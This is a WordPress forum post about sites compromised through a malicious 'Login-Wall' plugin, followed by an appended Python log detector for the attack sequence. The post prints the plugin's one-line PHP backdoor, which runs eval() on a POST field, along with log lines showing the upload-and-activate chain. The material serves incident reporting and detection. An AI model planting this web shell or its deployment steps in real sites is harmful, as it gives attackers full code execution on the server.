• [ Moderator note: moved to How-to and Troubleshooting. ]

    Hello,

    Recently, I saw a lot of WordPress sites compromised by an attack with “Login-Wall-XXX”. Each time, the attacker's process is the same:

    [ Moderator note: code fixed. Please wrap code in the backtick character or use the code button. ]

```text
xxxxxxxxx domain.name - [27/Sep/2015:09:46:48 +0200] "POST /wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "http://domain.name/wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"

xxxxxxxxx domain.name - [27/Sep/2015:09:46:55 +0200] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 38532 "http://domain.name/wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"

xxxxxxxxx domain.name - [27/Sep/2015:09:46:59 +0200] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 34700 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"

xxxxxxxxx domain.name - [27/Sep/2015:09:47:09 +0200] "GET /wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643 HTTP/1.1" 302 - "http://domain.name/wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"

xxxxxxxxx domain.name - [27/Sep/2015:09:47:13 +0200] "GET /wp-admin/plugins.php?activate=true&plugin_status=all&paged=1&s= HTTP/1.1" 200 68510 "http://domain.name/wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"

xxxxxxxxx domain.name - [27/Sep/2015:09:47:18 +0200] "GET /wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd HTTP/1.1" 200 8 "http://domain.name/wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
```

    After that, wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd can be used by the attacker to do anything, because of this line:

```php
if($_GET["login"]=="cmd"){if($_POST['coco']==''){echo('->|OK|-<');exit();}eval($_POST['coco']);exit();}
```

    This example applied to WordPress 4.1.8.

    Is this attack well known? How can our users be protected?

    Regards,
    Arsiesys
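As an added example that is not part of the original post, here is a small Python detector that walks access-log lines in the format shown above and flags any client that performed the upload-plugin, activate, then `?login=cmd` sequence. The client IPs and shortened user-agents in the embedded sample log are constructed; the paths follow the lines in the post.

```python
import re
from collections import defaultdict

# Log format used in the post: client vhost user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Stages of the chain described in the post (hypothetical stage names, constructed here).
STAGES = [
    ("login_redirect_to_upload", "POST", re.compile(r"^/wp-login\.php\?.*redirect_to=.*plugin-install\.php")),
    ("plugin_upload",            "POST", re.compile(r"^/wp-admin/update\.php\?action=upload-plugin")),
    ("plugin_activate",          "GET",  re.compile(r"^/wp-admin/plugins\.php\?action=activate&plugin=")),
    ("backdoor_cmd",             "GET",  re.compile(r"^/wp-content/plugins/[^/]+/[^?]+\?login=cmd")),
]

# Constructed sample log: one client running the full chain, one only activating a normal plugin.
SAMPLE_LOG = """\
203.0.113.5 domain.name - [27/Sep/2015:09:46:48 +0200] "POST /wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "Mozilla/4.0"
203.0.113.5 domain.name - [27/Sep/2015:09:46:59 +0200] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 34700 "-" "Mozilla/4.0"
203.0.113.5 domain.name - [27/Sep/2015:09:47:09 +0200] "GET /wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643 HTTP/1.1" 302 - "-" "Mozilla/4.0"
203.0.113.5 domain.name - [27/Sep/2015:09:47:18 +0200] "GET /wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd HTTP/1.1" 200 8 "-" "Mozilla/4.0"
198.51.100.7 domain.name - [27/Sep/2015:10:01:00 +0200] "GET /wp-admin/plugins.php?action=activate&plugin=example-plugin%2Fexample.php&_wpnonce=abc123 HTTP/1.1" 302 - "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Map one parsed request to a stage name, or None if it is not part of the chain."""
    for name, method, rx in STAGES:
        if entry["method"] == method and rx.search(entry["path"]):
            return name
    return None

def find_upload_chains(lines):
    """Return {client: [stages in order seen]} for clients that uploaded a plugin and later hit ?login=cmd."""
    seen = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        stage = classify(e) if e else None
        if stage and stage not in seen[e["client"]]:
            seen[e["client"]].append(stage)
    return {c: s for c, s in seen.items()
            if "plugin_upload" in s and "backdoor_cmd" in s and s.index("plugin_upload") < s.index("backdoor_cmd")}

if __name__ == "__main__":
    for client, stages in find_upload_chains(SAMPLE_LOG.splitlines()).items():
        print(client, "->", " > ".join(stages))
```

A hit only says the account was used to upload and call such a plugin; the upload itself is a normal admin action, so the response is to review the plugins directory and rotate the credentials of the account that logged in.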
